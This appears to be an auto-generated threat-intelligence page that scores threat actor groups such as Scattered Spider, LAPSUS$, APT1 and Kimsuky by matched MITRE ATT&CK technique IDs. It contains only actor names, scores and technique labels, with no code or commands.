Score: 6.06
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries

Scattered Spider

Score: 48.64
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1583.001 - Domains
  • T1019 - System Firmware
  • T1136.002 - Domain Account
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1619 - Cloud Storage Object Discovery
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link

Silent Librarian

Score: 8.58
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking

CURIUM

Score: 12.85
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI

Transparent Tribe

Score: 6.29
Matched TTPs:
  • T1115 - Clipboard Data
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI

Mustard Tempest

Score: 7.55
Matched TTPs:
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

BRONZE BUTLER

Score: 15.99
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1542.004 - ROMMONkit
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

admin@338

Score: 4.02
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1218.010 - Regsvr32

APT1

Score: 8.58
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control

INC Ransom

Score: 13.15
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries

Velvet Ant

Score: 7.58
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources

WIRTE

Score: 5.94
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries

Gorgon Group

Score: 11.01
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries

Darkhotel

Score: 5.60
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

Cinnamon Tempest

Score: 7.14
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries

Malteiro

Score: 6.14
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History

TA2541

Score: 10.20
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1547.013 - XDG Autostart Entries

SideCopy

Score: 5.09
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1547.013 - XDG Autostart Entries

BITTER

Score: 8.71
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

EXOTIC LILY

Score: 7.31
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1690 - Prevent Command History Logging
  • T1218.010 - Regsvr32

APT42

Score: 12.63
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1583.001 - Domains
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1132.002 - Non-Standard Encoding

Akira

Score: 12.62
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information

Nomadic Octopus

Score: 5.36
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries

TA551

Score: 8.05
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries

PLATINUM

Score: 9.27
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1686 - Disable or Modify System Firewall

Carbanak

Score: 4.61
Matched TTPs:
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking

ToddyCat

Score: 4.74
Matched TTPs:
  • T1009 - Binary Padding
  • T1553.004 - Install Root Certificate

APT33

Score: 6.60
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

LAPSUS$

Score: 22.52
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1136.002 - Domain Account
  • T1619 - Cloud Storage Object Discovery
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1564.003 - Hidden Window
  • T1132.002 - Non-Standard Encoding

Inception

Score: 9.48
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32

Deep Panda

Score: 8.43
Matched TTPs:
  • T1177 - LSASS Driver
  • T1027.014 - Polymorphic Code
  • T1553.004 - Install Root Certificate

Fox Kitten

Score: 11.96
Matched TTPs:
  • T1177 - LSASS Driver
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1656 - Impersonation
  • T1547.013 - XDG Autostart Entries

Metador

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries

Andariel

Score: 6.49
Matched TTPs:
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

BackdoorDiplomacy

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries

Confucius

Score: 6.58
Matched TTPs:
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information

FIN4

Score: 5.56
Matched TTPs:
  • T1574.010 - Services File Permissions Weakness
  • T1157 - Dylib Hijacking

Lotus Blossom

Score: 4.69
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1505 - Server Software Component

CopyKittens

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1553.004 - Install Root Certificate

Blue Mockingbird

Score: 7.44
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component

DarkHydrus

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1553.004 - Install Root Certificate

Elderwood

Score: 4.04
Matched TTPs:
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries

APT17

Score: 3.44
Matched TTPs:
  • T1656 - Impersonation

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate

Strider

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1091 - Replication Through Removable Media
  • T1003.007 - Proc Filesystem
  • T1218.012 - Verclsid
  • T1553.004 - Install Root Certificate
  • T1566.002 - Spearphishing Link
  • T1597 - Search Closed Sources
  • T1552.003 - Shell History
  • T1668 - Exclusive Control
  • T1132.002 - Non-Standard Encoding
  • T1087.004 - Cloud Account
  • T1027.014 - Polymorphic Code
  • T1547.013 - XDG Autostart Entries
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1059.010 - AutoHotKey & AutoIT
  • T1546.013 - PowerShell Profile
  • T1656 - Impersonation
  • T1690 - Prevent Command History Logging

Scattered Spider

Score: 0.69
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1027.002 - Software Packing
  • T1583.001 - Domains
  • T1597 - Search Closed Sources
  • T1204.001 - Malicious Link
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1019 - System Firmware
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
  • T1564.003 - Hidden Window
  • T1566.002 - Spearphishing Link
  • T1619 - Cloud Storage Object Discovery
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1218.005 - Mshta

Related CVEs

No CVEs were found in this Pulse.

Pulse – Threat actor graph

